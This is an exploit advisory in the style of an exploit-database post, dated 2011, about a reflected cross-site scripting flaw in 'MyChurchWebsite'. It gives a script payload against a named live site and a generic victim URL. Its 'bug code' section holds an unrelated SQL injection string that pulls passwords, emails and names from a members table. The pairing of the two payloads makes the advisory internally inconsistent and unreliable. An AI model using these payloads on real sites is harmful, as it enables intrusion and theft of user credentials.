< ------------------- header data start ------------------- >

#############################################
[#] Exploit Title: MyChurchWebsite Cross Site Script Vuln.
[#] Author: expulse/Bug Researchers
[#] Date: 01.07.2011
[#] Demo: http://cacop.net/search.php?pageID=search&search=<script>alert(document.domain)</script>
[#] Vuln Type: Reflected XSS
[#] Fixed : Zararli Karakterler Filitrelenmelidir.
##############################################
[*] ## Exploit ##:
[#] http://victim/search.php?pageID=search&search=XSSAttack]
[#] Inject XSS Code ~~>> GET / search=XSS
###############################################

< -- bug code start -- >

/uyebilgi.asp?uye=-1’+union+select+0,sifre,2,email,isim,id,6,7,8,9,0,1,2,3,4+from+uyeler

< -- bug code end of -- >

< ------------------- header data end of ------------------- >